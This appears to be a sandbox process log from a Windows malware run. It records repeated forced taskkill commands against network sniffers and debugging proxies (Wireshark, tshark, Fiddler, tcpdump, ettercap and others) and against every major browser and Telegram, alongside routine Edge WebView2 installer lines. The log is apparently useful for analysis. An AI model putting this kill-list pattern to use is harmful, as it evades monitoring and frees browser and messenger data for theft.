"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 --field-trial-handle=1960,i,13970003599932893106,3604989939369008533,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Program Files (x86)\Roblox\Versions\version-2cca5ed32b534b2a\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
MicrosoftEdgeWebview2Setup.exe /silent /install
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU2BDF.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MzU2NTc3MjQtRTk4Mi00MjAzLUFDNDgtQTc1OTU5ODM4QzVEfSIgdXNlcmlkPSJ7MzYyRjg1OEUtQUVBNi00MTkzLTg5MUUtNThEQUQ0NkUwMDY5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntDRkUwRDc1RS0xQTE1LTQyRTEtOEU4MS04RjExMDFBMEQxNzN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RHhPYmpIR2ErblJhMmF0QzN3bytJRXBDNzgrWlllQVVia1hwREMyY2o3VT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4Ny4zNyIgbmV4dHZlcnNpb249IjEuMy4xNzEuMzkiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcxMTg3MDQ3NzIiIGluc3RhbGxfdGltZV9tcz0iNjkzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{35657724-E982-4203-AC48-A75959838C5D}" /silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MzU2NTc3MjQtRTk4Mi00MjAzLUFDNDgtQTc1OTU5ODM4QzVEfSIgdXNlcmlkPSJ7MzYyRjg1OEUtQUVBNi00MTkzLTg5MUUtNThEQUQ0NkUwMDY5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntEQzZEMUU0NS0zMTNBLTRFRTktODY5MC0yNjRGMzhEQzY4M0F9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTEwLjAuNTQ4MS4xMDQiIG5leHR2ZXJzaW9uPSIxMTAuMC41NDgxLjEwNCIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjUiIHN5c3RlbV91cHRpbWVfdGlja3M9IjcxMjI4MjQ3ODUiLz48L2FwcD48L3JlcXVlc3Q-
C:\Windows\system32\cmd.exe
